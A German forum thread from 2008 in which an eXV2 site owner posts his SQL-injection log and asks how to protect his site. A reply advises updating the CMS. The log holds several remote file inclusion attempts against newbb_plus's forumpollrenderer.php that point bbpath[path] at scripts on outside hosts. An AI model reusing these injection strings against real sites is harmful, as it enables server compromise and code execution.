Forum : eXV2 Administration

Titel : Hacking auf meiner Webseite?

Fontes : 04.01.2008 13:36  Hallo Leute, ich weis zwar nicht ob ich hier im richtigen Thread bin (ansonsten verschieben oder löschen), aber ich hoffe das diese Infos auch wichtig für andere User sind. Meine Webseite ist noch lange nicht fertig, scheint aber schon heftigsten Hackerangriffen zu unterliegen. Im Logfile /cache/sqlinject.txt ist folgendes zu finden: LOGFILE: 11-12-2007 16:17:09 [fct=meta-generator] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 17:30:33 [op=select&kid=0] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 17:31:35 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 17:37:19 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 17:37:47 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 17:59:40 [op=select&kid=2] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 18:02:20 [fct=meta-generator] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 18:53:36 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 22:36:29 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 22:36:51 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 22:37:20 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 22:37:20 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 23:01:14 [fct=meta-generator] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 11-12-2007 23:12:40 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 04:46:31 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 04:46:32 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 04:47:01 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 04:47:36 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 04:52:56 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:01:36 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:03:48 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:14:42 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:20:33 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:21:02 [op=select&kid=3] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:34:55 [fct=meta-generator] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 05:44:11 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 06:16:17 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 06:20:12 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 06:30:47 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 07:14:51 [op=select] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 12-12-2007 07:15:20 [op=select&kid=3] from: 88.6.253.148; ServerName: www.gelbeseiten-mallorca.net 03-01-2008 18:04:28 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.laila.jp/item_pics/derf/testador.txt?????????????????????????????] from: 216.67.231.247; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 18:11:01 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://kmtm.ft.ugm.ac.id/safeon.txt??] from: 69.72.142.178; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 18:19:44 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.gumgangfarm.com/shop/data/id.txt?] from: 216.67.231.247; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 19:28:27 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.geocities.com/ibn_yosef/safeid.txt?] from: 205.134.252.26; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 19:31:15 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.geocities.com/ibn_yosef/safeid.txt?] from: 216.67.231.247; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 19:36:03 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.geocities.com/ibn_yosef/safeid.txt?] from: 216.67.231.247; ServerName: www.gelbeseiten-mallorca.info 03-01-2008 19:38:50 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.geocities.com/ibn_yosef/safeid.txt?] from: 216.67.231.247; ServerName: www.gelbeseiten-mallorca.info 04-01-2008 09:51:58 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????] from: 80.82.114.137; ServerName: www.gelbeseiten-mallorca.info 04-01-2008 10:06:13 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://216.126.65.86/dev/cgi-bin/cgi.txt??] from: 67.15.14.22; ServerName: www.gelbeseiten-mallorca.info 04-01-2008 10:14:17 [op=select//modules/newbb_plus/class/forumpollrenderer.php?bbpath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??] from: 74.220.207.135; ServerName: www.gelbeseiten-mallorca.info Meine Fragen: 1. Was nun ? 2. Gibt es einen Link und/oder Hinweis wie die ideale Absicherung aussehen muss. 3. Besteht nicht die Möglichkeit in diesem Forum einen Thread einzurichten, in welchem die Webmaster die Bad-IPs etc. posten können, um sie eventuell im Vorfeld abwehren zu können. (z.B. ähnlich Bot-Trap) Mit freundlichen Grüssen Fontes

bama : 04.01.2008 16:52  wenn du hier unter suchen "hacker" eingiebst, findest du sehr viele Beiträge zu diesem Theme dein Script zeigt ja, dass sqlinject sehr gut funktioniert da die Hacker ja ungesichterte Netzwerke, WLAN oder oder wechselde IP usw. benutzen, ist es sinnlos, die IP etc. zu speichern, du kannst nur die eigene Webseite so gut als möglich absichern und vor allem immer auf die neueste Version von eXV² updaten.